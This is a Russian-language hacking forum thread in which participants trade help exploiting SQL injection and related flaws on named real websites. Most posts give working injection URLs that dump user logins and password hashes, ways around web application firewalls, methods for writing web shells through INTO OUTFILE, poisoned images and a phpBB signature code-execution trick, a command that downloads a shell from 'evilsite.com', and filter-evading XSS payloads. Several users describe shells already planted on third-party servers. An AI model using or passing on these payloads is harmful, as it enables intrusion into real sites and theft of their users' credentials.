А не проще ли ответить: "Нет, невозможно таким макаром никак изменить данные таблицы" или "да возможно, и выложить реализацию".


Нет, невозможно таким макаром никак изменить данные таблицы.

Ereee said:
Нет, невозможно таким макаром никак изменить данные таблицы.


лолчто

я сегодня вроде не пил, но могу сказать что как бы можно, если права есть.

определенные команды надо знать и бинго.

Не так ли, граждане?

а все дошло.

я то думал вы вообще не можете изменить.

просто вместо select пишешь update и соблюдаешь синтаксис

stan0009 said:
лолчто
я сегодня вроде не пил, но могу сказать что как бы можно, если права есть.
определенные команды надо знать и бинго.
Не так ли, граждане?
а все дошло.
я то думал вы вообще не можете изменить.
просто вместо select пишешь update и соблюдаешь синтаксис


я не знаю как, я еще раз повторюсь, что если бы знал, не пиросил бы помощи тут! Кто знает как решить данную проблему, отпишитесь ПРИМЕРОМ а не ссылаясь на синтаксис и т.д.

PS OS Windoows, права root

cipa21 said:
я не знаю как, я еще раз повторюсь, что если бы знал, не пиросил бы помощи тут! Кто знает как решить данную проблему, отпишитесь ПРИМЕРОМ а не ссылаясь на синтаксис и т.д.
PS OS Windoows, права root


тебе что сейчас рассказывать о запросах в мускуле? чего ты хочешь? это тема для решения конкретных проблем, а не обсуждения общих вопросов.

ладно, я добрый. держи первую ссылку из гугла.

http://sitear.ru/material/mysql-zaprosy

cipa21 said:
я не знаю как, я еще раз повторюсь, что если бы знал, не пиросил бы помощи тут! Кто знает как решить данную проблему, отпишитесь ПРИМЕРОМ а не ссылаясь на синтаксис и т.д.
PS OS Windoows, права root



что значит ос windows, права root?

to cipa21

Если у тебя root права, попробуй поискать phpmyadmin. Да и права на запись у тебя есть, ищи пути и заливай шелл, делов то. А то устроил тут балаган!

Konqi said:
что значит ос windows, права root?


Это значит что есть скуля от сайта у которого в конфиге подключения к бд логин root и имеющий полные права на любые действия с базой.

cat1vo пхпмиадмин искал...

cipa21 said:
Это значит что есть скуля от сайта у которого в конфиге подключения к бд логин root и имеющий полные права на любые действия с базой


как ты определил наличие полных прав? даже если это так, то ты не сможешь выполнить UPDATE в SELECT запросе, что тебе уже объяснили. попробуй залиться через into outfile.

Здравствуйте!

Есть некий сайт domain.com.

При запросе на domain.com/form происходит 302 редерект на domain.com/form?secret_hash=xxxxx

Собственно, вопрос как можно получить данный хеш со стороны клиента, средствами js?

получаю Iframe src по id фрейма, дает только начальный урл.

Здравствуйте только начал заниматься sql инъекциями, You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'')' at line 1Получение действия по модулю и имени точки входа - select * from action_get_by_mod_func('frames', '-1''); You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'')' at line 1 вот такое выдает сервер, что из этого можно извлечь кроме хSS

to niva622

Тема для изучения (https://antichat.live/threads/43966/)

такой вопрос, уже придумали в мире какойнибуть способ как можно узнать таблици в майскул 4 или как и преждее наугад подбирать?

и ещо вопрос, залил шелл на сайт, открываю его а мне пишет


Fatal error: Uncaught exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (upload)' in /home/ххх/domains/library/Zend/Controller/Dispatcher/Standard.php:241 Stack trace: #0 /home/ххх/domains/library/Zend/Controller/Front.php(934): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http)) #1 /home/ххх/domains/dreamhome.by/public_html/index.php(320): Zend_Controller_Front->dispatch() #2 {main} thrown in /home/ххх/domains/library/Zend/Controller/Dispatcher/Standard.php on line 241


чё ет за бред и что в таком случае можно сделать?

Таблицы как и раньше только брут, вроде ничего не придумали за последнее время.

Смотря на ошибку, ты его походу не залил!

cat1vo said:
Таблицы как и раньше только брут, вроде ничего не придумали за последнее время.
Смотря на ошибку, ты его походу не залил!


та не, залил, заливал через майскул,

перепроверил, и от него ответ already exists

там походу трабла с .htaccess

так как залил картинку и открывает, правда пишет


Изображение «upload/articles/previews/15.jpg» не может быть показано, так как содержит ошибки.



но всётаки заливает

А залить пустой .htaccess не вариант?

cat1vo said:
А залить пустой .htaccess не вариант?


заливал, а толку?

Господа. Вы иногда просто поражаете. Если уж взялись изучать такую, собственно требующую весьма разносторонних знаний область как хак, то будьте уж добры готовы рыть носом тонны мануалов. Если бы вы забили в гугл сигнатуру ошибки - то быстро бы нашли ответ что это явно говорит о том, что сайт построен на zendFramework. А в нем родном, все идет через .htaccess идущий в корне на уровне логики приложения. И линк к .php файлу ретранслируется в соответствии с правилами заложенными в этот .htaccess. Вот отсюда и ошибка и невозможность получить прямой доступ к залитому .php файлу НЕ ЯВЛЯЮЩЕМУСЯ сегментом структуры сайта.

А: Если конфигурация сервера позволяет переопределять правила .htaccess в дочерних директориях, тогда залив в соответствующую папку .htaccess с правилами низводящими вышестоящие корневые и позволяющие обратиться к файлу с php кодом как к файлу а не контроллеру - то будет тебе профит.

B: Если есть субдомены у сайта то можно через них попробовать .

C: Пустой htaccess и не даст результата потому, что в нем нет ничего что позволило бы отменить обращение к php файлу как к контроллеру.

D: Вероятно среди папок сайта есть такие на которые не распространяются правила роутинга.

Cennarios said:
А: Если конфигурация сервера позволяет переопределять правила .htaccess в дочерних директориях, тогда залив в соответствующую папку .htaccess с правилами низводящими вышестоящие корневые и позволяющие обратиться к файлу с php кодом как к файлу а не контроллеру - то будет тебе профит.


а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен

qaz said:
а я читал про, про .htaccess, но чёт там не ввидел как сделать чтобы сделать то о чём вы говорите, если подскажите что в нём нужно прописать и дадите ссыль но ПОЛНЫЙ мунал по .htaccess буду очень презнателен



На неделе, как будет время оформлю пост на эту тему. Сейчас ,к сожалению, проблема с временем.

Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!


Code:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from +(0x6D7973716C2E75736572)+limit+0,1--

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+m amb_users+limit+0,1--

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28)--

cipa21 said:
Не могу раскрутить.... Мнения типа "читай мануал" и т.д. оставьте при себе и пройдите мимо!

Code:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,host,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from +(0x6D7973716C2E75736572)+limit+0,1--

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,id,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28)+from+m amb_users+limit+0,1--

http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28)--



http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+(select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28+from+tli_users)--+

читай мануал

cipa21,

я не хочу говорить "читай мануал", но "читай мануал".

Смотри:

from+(0x6D7973716C2E75736572)

Такое только в кошмарах приснится, нельзя тут хекс юзать.

И вообще там WAF стоит, обходится так:


Code:
http://www.tranleint.com/tranleint/index.php?option=com_order&id=-13+union+/*!select*/+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--+f

Версия 5.1.56

И снова я... Здрасьти...


Code:
http://www.chnlawyer.org/index.php?option=com_ask&task=ask&act=view&ID=21&menuid=1+union+select+@@version

information_schema не доступен. Брут таблиц результата не дал. Есть предложения?

У вас 4ая версия Mysql. В ней еще не было Information_schema! Здесь только вариант брута!

http://hotel-booking-russia.com/catalog-hotel.shtml?id=11%20and%201=2%20union%20select%201 ,2,3,4,COLUMN_NAME,6,7,COLUMN_NAME%20from%20INFORM ATION_SCHEMA.COLUMNS%20Where%20table_name=%27test_ customers%27%20limit%202,1 не могу найти админа.

to ReV0LVeR


Code:
http://hotel-booking-russia[dot]com/catalog-hotel.shtml?id=-11+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,uid,l ogin,password,level)+from+test_user+limit+0,1#

Ищите здесь админа, там несколько уровней у пользователей, я не смотрел кто там именно админ!

hash вида mysql

cipa21 said:
information_schema не доступен.
Брут таблиц
результата не дал. Есть предложения?


Там будет типа PREFIX_users. Joomla.

[QUOTE="ReV0LVeR"]
ReV0LVeR said:
hash вида mysql

http://www.admcity.nnov.ru/script/phones1.php?id=6783+and+1=2

исчезает содержимое страници

так перебираю, нифига

http://www.admcity.nnov.ru/script/phones1.php?id=6783+and+substring%28@@version,1,1% 29=5

может всё же ето не blind sql???

у Вас там FireBird 2.1.3

Крутить как вы верно заметили через Blind SQL

Наткнулся на скулю, раскрутил, слил базу юзеров. Хочу залить шелл. Админки, как таковой нету, но есть модераторы с расширенными возможностями (в частности редактирования статей). FILE_PRYV = off Можно загрузить фотку на сервер. Я загрузил фото-шелл(сделал я его по такой схеме:


1. Создаем любое изображение
$ echo "" > simple_shell.php
$ cat 1.jpeg simple_shell.php >> poisoned.jpeg
Картинка готова к загрузке.


) На сервер фото залилось удачно, но php инклуда я так и не нашел . Можно ли еще каким-либо способом залить шелл ?

Есть инжект ErrorBased:


Code:
1'or(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1

получаю как и положено:


Code:
Duplicate column name '5.0.77-log'

версия 5.0.77

делаю:


Code:
1'or(select*from(select(name_const(database(),1)), name_const(database(),1))a)and(1)='1

и получаю ошибку в операторе NAME_CONST


Code:
Incorrect arguments to NAME_CONST

что в корне нелогично так как предыдущая команда выполнилась

пробую еще:


Code:
1'or(select*from(select(name_const((select(SUBSTRI NG(group_concat(table_name),1,64))from(information _schema.tables)),1)),name_const((select(SUBSTRING( group_concat(table_name),1,64))from(information_sc hema.tables)),1))a)and(1)='1

и та же херь:


Code:
Incorrect arguments to NAME_CONST

что еще можно сделать?

\/ITA,

через rand выводи.

UPD:

https://rdot.org/forum/showthread.php?t=60

Ereee said:
\/ITA
,
через rand выводи.
UPD:
https://rdot.org/forum/showthread.php?t=60


пытаюсь, безпробельный вариант через ранд ваще нереал, нужно чтобы были одни скобки

UPD:

спс, нашел способ в том топике

to \/ITA

Увы, но в name_const() выводится только version()...

Подскажите пожалуйста, что делать если введенную xss показывает просто как текст?

to foma2120

Больше данных, что за xss. Где, как, что показывает... Из Ваших слов ничего не понятно!

foma2120 said:
Подскажите пожалуйста, что делать если введенную xss показывает просто как текст?


что делать? открыть учебник по кодингу, и курить очень долго =\

http://www.php.su/functions/?htmlspecialchars

Такой вопросец, немогу чёт понять как разкрутить ету слепую скулю

так вроде норм


PHP:
http://board.ugmk.info/?type=(substring(@@version,1,1)=5)

а так ошибка


PHP:
http://board.ugmk.info/?type=(ascii(substring(select+table_schema+from+in formation_schema.tables+limit+0,1),1,1)>0)

чё ему там не нравится?

to qaz

Зачем слепая? Все отлично выводится! Выберайте как Вам удобнее...


Code:
http://board.ugmk.info/?b=1337350801+or+1+group+by+mid(version(),floor(ra nd(0)*2),64)+having+avg(0)--+or+1



Code:
http://board.ugmk.info/?b=1337350801+and+extractvalue(1,concat(0x3a,versi on()))--+

Как залить шелл в phpbb 2.0.21 ? Доступ в админку есть, sql injection и php инклуда на сайте нет.

to bodrich

Все способы заливки шелла в phpbb форуме (https://antichat.live/showpost.php/p/198446/postcount/3/)

qaz said:
Такой вопросец, немогу чёт понять как разкрутить ету слепую скулю
так вроде норм

PHP:
http://board.ugmk.info/?type=(substring(@@version,1,1)=5)

а так ошибка

PHP:
http://board.ugmk.info/?type=(ascii(substring(select+table_schema+from+in formation_schema.tables+limit+0,1),1,1)>0)

чё ему там не нравится?


ответ прост, ты как минимум забыл добавить скобки


http://board.ugmk.info/?type=1+and+ascii(substring(
(
select%20table_name+from+information_schema.tables +limit+1,1),1,1)
)
>255%23

http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject&start=1390


Помогите со скулёй, чёт ничего не выходит

Как минимум раскручивается инъекция в order by (sortme=post_subject)

qaz said:
Помогите со скулёй, чёт ничего не выходит



http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject&start=1390,1--+ - TRUE => скуля в LIMIT'e.

Такие скули можно раскрутить только если в запросе не присутствует order by.

В данной скуле Order by уже есть, т.ч. нет.

Или если у юзера есть file_priv то через такую скулю можно залиться:

limit=10,1 limit 1 into outfile '/path/filename.php' lines terminated by 'olololo'-- a

Но в другом параметре (sortme) можно скулю раскрутить через ErrorBased.

Там скуля в параметре order by.

http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject,(select+1+from+(select+count(0 ),concat((select+version()),floor(rand(0)*2))+from +information_schema.tables+group+by+2+limit+1)a)--+

Duplicate entry '5.1.61-0+squeeze1-log1' for key 'group_key'

//offtop я хотел чтобы человек подумал хоть, а ты...(

http://dnzl.ru/view_post.php?id=80%27+and+1=0+union+select+1,user %28%29,3,4,5,6,7,8,9,10,11,12,13,14,15+--+


пздц не могу обойти. Фильтр на from table и тд...

shadowrun said:
пздц не могу обойти. Фильтр на from table и тд...


http://dnzl.ru/view_post.php?id=80%27+and+1=0+union%0Aselect+1,ta ble_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+info rmation_schema.tables--+

2d1v утебя выводит?

to shadowrun

Наглядный пример того, что все там видно!


Code:
http://dnzl.ru/view_post.php?id=80'+and+1=0+union%0Aselect+1,(sel ect(@x)from(select(@x:=0x00),(select(0)from(inform ation_schema.columns)where(table_schema!=0x696e666 f726d6174696f6e5f736368656d61)and(0x00)in(@x:=conc at(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a ,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15--+

cat1vo said:
to
shadowrun
Наглядный пример того, что все там видно!

Code:
http://dnzl.ru/view_post.php?id=80'+and+1=0+union%0Aselect+1,(sel ect(@x)from(select(@x:=0x00),(select(0)from(inform ation_schema.columns)where(table_schema!=0x696e666 f726d6174696f6e5f736368656d61)and(0x00)in(@x:=conc at(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a ,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15--+



меня сюда посылает http://sweb.ru/insecure

____________

UPD

А не, всё есть спс)

Ну или так постом

id=80'and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1='1

как таблицы вывести тут?

http://www.yarmarka-vacancy.ru/index.php?id=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20%0afrom+information_schema .tables+--+&option=com_tpjobs&page=3&task=searchbyloc

Пытаюсь загрузить шелл на форум через админку (форум phpbb 2.0.21).

Делаю это вот так:


Создаем файл 1.sql суем в него код
SELECT '' FROM phpbb_users LIMIT 1 INTO OUTFILE '/home/lol/htdocs/forum/shell.php';
В админке востанавливаем через бд этот файл.


Восстанавливаю через бд этот файл и мне пишет:


Can't create/write to file '/var/www/****/data/www/********.org/forum/shell.php' (Errcode: 13)


Это значит нет прав на запись ? (хотя если указать путь /tmp, то ошибок нет)

Пробывал вот таким вариантом:


Создаем текстовый файл 1.sql суем в него код
Код:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb
hpinfo()' WHERE user_id=2;
ну вместо 2 ставим свой id
Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца
заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.


phpinfo() выводит, а вот как загрузить шелл ? Я пытался примерно так:


UPDATE php2bb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:system("wget http://mysite.com/shell.php")' WHERE user_id=2;


. Но увы, так не работает (

Code:
wget http://mysite.com/shell.php

->


Code:
wget -O shell.php http://mysite.com/shell.php

bodrich

Может стоить хоть немного мат часть изучить?

1. wget'a возможно нету, или нету прав на диру.

2. Шелл можно загрузить в /tmp а потом его проинклюдить (user_sig='phpbb:include("/tmp/shell.bmp")')

=\

cat1vo, спасибо, но не помогло.


1. wget'a возможно нету, или нету прав на диру.


Это я понял, просто спрашивал, что быть 100% увереным.


2. Шелл можно загрузить в /tmp а потом его проинклюдить (user_sig='phpbb:include("/tmp/shell.bmp")')


Пробывал уже, не получается (

DELITE

to абвгдешка


Code:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+l imit+0,1), FLOOR(RAND(0)*2), 64))

to bodrich

У Вас не получается, потому как может стоять FreeBSD там нет wget'a там fetch стоит по умолчанию,a лучше делать через file_put_contents("shell.php",file_get_contents("http://evilsite.com/shell.txt"))


Пробывал уже, не получается (


Может уже есть там такой файл? И лейте в папку со смайлами!

Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?

Никак!

Товарищи!

Тема: phpmyadmin

имеется доступ к /scripts/setup.php

точнее: версия 2.11.2.2

сплоиты не пашут.

Можно ли что-то сотворить чтобы войти в админку?

спасибо.

PS: на кнопки хоть тыкай, хоть нет: config.inc.php пуст,как добавить нового юзера понятия не имею

Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела.

Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись.

Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта.

Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать?

Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта.

Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)

Га-Ноцри

если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место

chmod 750, допустим

по поводу мускулного запрета (secure_file_priv) , читай тут (http://dev.mysql.com/doc/refman/5.0/en/server-system-variables.html#sysvar_secure_file_priv)

Konqi said:
Га-Ноцри
если смотреть со стороны привилегий то Пользователь mysql находится в группе "others" для серверных файлов, стоит просто чмодить файлы веба, сделать нечитабельными для "others" и все станет на место
chmod 750, допустим
по поводу мускулного запрета (secure_file_priv) , читай
тут (http://dev.mysql.com/doc/refman/5.0/en/server-system-variables.html#sysvar_secure_file_priv)


Большое спасибо за пояснение. Вопрос исчерпан. Углубился в чтение

cat1vo said:
to
абвгдешка

Code:
-1' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) x GROUP BY MID((SELECT+CONCAT_WS(0x3a,user,pass)+from+users+l imit+0,1), FLOOR(RAND(0)*2), 64))



Зачем вот так усложнять запрос?

Лишнее палево в логах.


Code:
1' or 1 group by concat(version(),rand(0)|) having min(0)

Having min(0) не всегда нужен.

У Вас ошибка молодой человек, решили "поумничать", так писали бы правильно!


Code:
1' or 1 group by concat(version(),rand(0)|0) having min(0)

cat1vo said:
У Вас ошибка молодой человек, решили "поумничать", так писали бы правильно!

Code:
1' or 1 group by concat(version(),rand(0)|0) having min(0)



Опечатка настолько действительна?

Я думаю кому это реально интересно, сможет заметить.

И откуда тебе знать, может это скрипт киддинг?

ребят,а заливал кто шелл в cms-ку Cartweaver (http://www.cartweaver.com/welcome-to-cartweaver/)

поимел админку,а залиться не выходит...нашел блайнд-скулю,но через неё тоже не вышло...тем более mysql

Groove said:
Ребята что можно сделать с такой проблемой - Есть данные бд от сайта но подключиться можно только по localhost , как быть с удаленным подключением ?


Узнать кто хостер, и взять тест на пару дней, многие хостеры предоставляют такую услугу. Ну а дальше дело техники...

cipa21 said:
Что можно сделать с этим? http://donetsk.life.dn.ua/nb/view.php?id=12169&cat=1'


/**/

Га-Ноцри said:
Добрый вечер, парни. Вопрос такого характера. На днях столкнулся с, казалось бы идеальным вариантом заливки через GET-запрос в адресной строке браузера: file_priv == Y, MQ == off, раскрытие путей, все дела.
Быстро просканив директории сайта, на предмет каталогов, куда бы залить бекдор, меня везде ждал облом. Я списал это на отсутствие прав на запись.
Однако, поскольку сайт бы русскоязычный, я предположил, что там возможно присутствие папки Sape, которая всегда 0777. Так, вот имея все вводные данные, описанные выше, я не смог прочитать через load_file исходный код страницы index.php. Вообще никаких. /etc/passwd, мускульные конфиги - да, но только не файлы из каталогов самого сайта.
Я где-то читал, что мускул имеет возможную настройку, на запрет чтения файлов из каталога сайта, что именно и было в моем случае, как я понял. Был бы признателен за ссылки по этому вопросу - как настраивается подобная фича, где почитать?
Ведь это можно считать довольно неплохим рубежом защиты и для своего проекта.
Спасибо за любую помощь(в гугле не забанен, но что-то ничего не нашел, релевантное моему вопросу.)



В дополнение, могу упомянуть возможность использования php технологий gid-uid - те верификации пользователя:группы при запуске скрипта. Как-то: suexec, apache-mpm etc. В таком случае, скорее всего, даже если директория будет 0777 - nто если uid MYSQL(user) отличается от владельца(создателя) файла(директории) в корне сайта - то не прочтешь и не зальешь. В таком случае надо искать директории на которые выставлены специфические права позволяющие это делать.

Подскажите пожалуйста, залил шел wso2 на форум (forum.site.ru), возможно ли как то получить доступ к файлам site.ru? простой переход на директорию ниже не выходит

Safe mode: OFF

Open base dir: var/www/u1111/www/forum.site.ru

CheatXX said:
Подскажите пожалуйста, залил шел wso2 на форум (forum.site.ru), возможно ли как то получить доступ к файлам site.ru? простой переход на директорию ниже не выходит
Safe mode: OFF
Open base dir: var/www/u1111/www/forum.site.ru


Нетривиальный вопрос.

Варианты ответов:

Если домен на одной тачке с поддоменом:

1) Да, поднимись выше в директории и пошарься там, если права позволяют

2) Да, поднимись выше в директории и пошарься там, предварительно рутнув хост

Если домен на разных тачках с поддоменом:

1) Да, если при коннекте в бд всплыла БД основного сайта. Меняешь что надо - цепляйешься в админку самого домена и льёшь новый шелл.

2) Нет, не фартануло, не повезло.

Конечно, есть вариации....

На одном хостинге, выше подняться не позволяют права, мне даже не то что бы доступ к файлам нужен был, а получить список файлов (ардрес админки найти)

CheatXX said:
На одном хостинге, выше подняться не позволяют права, мне даже не то что бы доступ к файлам нужен был, а получить список файлов (ардрес админки найти)


у форума адрес админки никак не выше директивы с самим форумом, либо в этой же директории, либо в поддиректории.

Читай php файлы - увидешь как и куда логиниться

я имел ввиду админку сайта

CheatXX said:
я имел ввиду админку сайта


Читай внимательнее (https://antichat.live/showpost.php/p/3149966/postcount/20684/)

BigBear said:
у форума адрес админки никак не выше директивы с самим форумом, либо в этой же директории, либо в поддиректории.
Читай php файлы - увидешь как и куда логиниться


если админ граммотный, то админку так можно спрятать что никогда ненайдешь ее.

winstrool said:
если админ граммотный, то админку так можно спрятать что никогда ненайдешь ее.


"грамотный" //забавно вышло ))

Дело не в грамотности, а в удобстве использования...

Сомневаюсь что у ТС именно этот случай.

Ребят, не могу скулю джумлувскую раскрутить

имеется url


site.com/index.php?do=show&func=latest&Itemid=34'


компонент com_fireboard

/showpost.php?p=1416107&postcount=148

этот метод мягко говоря не помогает

как и что в этой ситуации делать не знаю

Добрый час, есть url следующего вида http://site.ru/?p=3

если подставить несуществующий id то будет ошибка (например 9993)

Warning: include(glob/ref9993_+.php) [function.include]: failed to open stream: No such file or directory in /home/u*****/siteru/www/global.php on line 26

как раскрутить тут php inj?

получается добавляются символы до и после...

mr.KREGI said:
Добрый час, есть url следующего вида http://site.ru/?p=3
если подставить несуществующий id то будет ошибка (например 9993)
Warning: include(glob/ref9993_+.php) [function.include]: failed to open stream: No such file or directory in /home/u*****/siteru/www/global.php on line 26
как раскрутить тут php inj?
получается добавляются символы до и после...


для начало чтоб задовать вопросы необходима ознакомиться со статьями по соотвецтвующему вопросу, а только потом уже задовать, также каждый случай уникален, и если вы хотите, чтоб вам помогли то раскрывайте урл полностью, по данному вопросу прочтите вот эту статейку /thread12123.html

winstrool said:
для начало чтоб задовать вопросы необходима ознакомиться со статьями по соотвецтвующему вопросу, а только потом уже задовать, также каждый случай уникален, и если вы хотитечтоб вам помогли то раскрывайте урл полностью, по данному вопросу прочтите вот эту статейку /thread12123.html


ок, спасибо за ответ, статьи читал и опыт с php inj есть, в моем случае получается локальный инклуд, проблема состоит в том что подставляются символы во время инклуда... не знаю как решить.

url раскрывать в паблик не хочется, могу написать в ЛС ,если поможете.

Пробуйте вариант с null байтом или усечением пути!

Ребят,такая проблема,подскажите,плз...

Есть сайт,висит на Windows,бд MSSQL...также на нем есть старый блог на вордпресс с MySQL и неприкрытым phpmyadmin...через блог залил шелл WSO,оказался внутри сервака,но под гостем...exe запускать не могу,но файлы сайта(asp) изменять могу...нашел данные от MSSQL,но по ним не подрубается...

Вопрос: что нужно добавить к примеру в 404.asp,чтобы создать искусственную sql-иньецию(возможно у MSSQL больше прав)?

вроде нaшел скулю пишет ошибка


SQLSTATE[HY000]: General error: 1191 Can't find FULLTEXT index matching the column list


как раскрутить?

Spoos said:
вроде нaшел скулю пишет ошибка
как раскрутить?


А как крутил ?

t3cHn0iD said:
А как крутил ?


http://admin.site.com/goods/?where=dsffds''

Spoos said:
http://admin.site.com/goods/?where=dsffds''




Code:
http://admin.site.com//goods/?where=1)+limit+1,1+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,concat_ws(0x3a,user(),dat abase(),version()),19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46--+

Можно получить права админа mysql с помощью phpmyadmin 2.11.11.3

Учетка юзера в базе есть, к file нет привилегий.

нашел по сути банальную xss в input.

проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.

знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.

где то проскакивал способ через eval, но я не осилил.

+ ограничение на 100 символов.

justonline said:
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.




PHP:


Где


PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K


это alert('XSS').

Ereee said:

PHP:


Где
это alert('XSS').


работать дальше тега input нельзя. и больше 100 символов писать нельзя

на сайте закрыто все, что можно из xss... но одно поле забыли...и то сделали фильтрацию // только для того, что бы не было нагромождений и показывало обычный урл. Они даааже не подозревали, сколько это вызовет у меня негодований

энибоди кен хелп ми?

такой вопросец

нормально вывело версию


PHP:
http://www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+vers ion%28%29%29,0x00,floor%28rand%280%29*2%29%29havin g+min%280%29+or+1--+

пытаюсь к примеру вывести таблицы


PHP:
http://www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws( 0x3a,table_schema,table_name,table_rows)+from+info rmation_schema.tables+where+table_schema!=0x696e66 6f726d6174696f6e5f736368656d61+limit+0,1),0x00,flo or(rand(0)*2))having+min(0)+or+1--+

уже переадресация, чёзаа байда, как боротся?

qaz said:
такой вопросец
нормально вывело версию

PHP:
http://www.chronopuncture.info/vr/index.php?md=details&id=108093%27+or+1+group+by+concat%28%28select+vers ion%28%29%29,0x00,floor%28rand%280%29*2%29%29havin g+min%280%29+or+1--+

пытаюсь к примеру вывести таблицы

PHP:
http://www.chronopuncture.info/vr/index.php?md=details&id=108093'+or+1+group+by+concat((select+concat_ws( 0x3a,table_schema,table_name,table_rows)+from+info rmation_schema.tables+where+table_schema!=0x696e66 6f726d6174696f6e5f736368656d61+limit+0,1),0x00,flo or(rand(0)*2))having+min(0)+or+1--+

уже переадресация, чёзаа байда, как боротся?


фильтруется from

winstrool said:
фильтруется
from


select from

Code:
